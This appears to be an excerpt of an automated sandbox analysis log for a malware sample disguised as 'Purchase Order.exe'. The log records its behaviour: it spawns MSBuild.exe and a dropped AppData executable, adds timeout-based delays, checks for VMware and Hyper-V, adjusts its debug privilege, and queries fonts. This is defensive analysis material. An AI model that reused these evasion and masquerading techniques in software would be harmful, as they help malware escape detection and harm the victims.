                    Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5417
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: MSBuild.exe, 00000011.00000003.394872039.0000000006494000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.395492740.000000000647F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.513705001.000000000647F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.397896256.000000000647F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.396384984.000000000647F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.507075685.000000000145C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000003.394842655.0000000006486000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Purchase Order.exe, 00000000.00000002.371341648.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, Puizg.exe, 00000017.00000002.505962003.0000000000A04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Puizg.exe, 00000017.00000002.514910753.0000000007280000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\f
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 17_2_06895308 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\Purchase Order.exeMemory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Users\user\Desktop\Purchase Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Users\user\AppData\Roaming\Oarkzlb\Puizg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Users\user\Desktop\Purchase Order.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase Order.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
